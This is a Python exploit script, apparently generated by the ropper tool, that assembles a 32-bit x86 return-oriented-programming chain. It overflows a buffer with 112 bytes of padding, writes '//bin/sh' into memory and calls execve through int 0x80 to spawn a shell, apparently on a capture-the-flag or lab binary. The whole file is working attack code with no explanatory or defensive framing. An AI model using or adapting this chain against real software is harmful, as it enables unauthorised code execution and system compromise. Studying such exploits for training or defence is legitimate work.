#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack
import sys

p = lambda x : pack('I', x)

IMAGE_BASE_0 = 0x08048000 # 8ddd39815a181db09a48077a6f5371c78bfadfbd90e5f8fd34c300f231fd3692
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = b'a' * 112

# Set ecx to point to an empty string
rop += rebase_0(0x00009230) # 0x08051230: xor eax, eax; ret; 
rop += rebase_0(0x00035f8e) # 0x0807df8e: xchg ecx, eax; mov eax, esi; pop ebx; pop esi; pop edi; ret;  
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)

# Set ebx to point to "//bin/sh"
rop += rebase_0(0x00031d22) # 0x08079d22: pop edx; ret; 
rop += b'//bi'
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret; 
rop += rebase_0(0x000a4040)
rop += rebase_0(0x0000e516) # 0x08056516: mov dword ptr [ebx], edx; pop ebx; pop esi; pop edi; ret; 
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x00031d22) # 0x08079d22: pop edx; ret; 
rop += b'n/sh'
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret; 
rop += rebase_0(0x000a4044)
rop += rebase_0(0x0000e516) # 0x08056516: mov dword ptr [ebx], edx; pop ebx; pop esi; pop edi; ret; 
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x00009230) # 0x08051230: xor eax, eax; ret; 
rop += rebase_0(0x00031d22) # 0x08079d22: pop edx; ret; 
rop += rebase_0(0x000a4048)
rop += rebase_0(0x0002213b) # 0x0806a13b: mov dword ptr [edx], eax; ret;

# Filled registers: ebx, edx, eax, 
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret; 
rop += rebase_0(0x000a4040)
rop += rebase_0(0x00031d22) # 0x08079d22: pop edx; ret; 
rop += rebase_0(0x000a4048)
rop += rebase_0(0x00009230) # 0x08051230: xor eax, eax; ret; 

# Set edx to point to an empty string
rop += rebase_0(0x00009230) # 0x08051230: xor eax, eax; ret; 
rop += rebase_0(0x0000e4b5) # 0x080564b5: mov edx, eax; ret; 

for i in range(11):
    rop += rebase_0(0x0001de10) # 0x08065e10: add eax, 1; pop edi; ret; 
    rop += p(0xdeadbeef)

rop += rebase_0(0x000222a0) # 0x0806a2a0: int 0x80; ret; 

sys.stdout.buffer.write(rop)

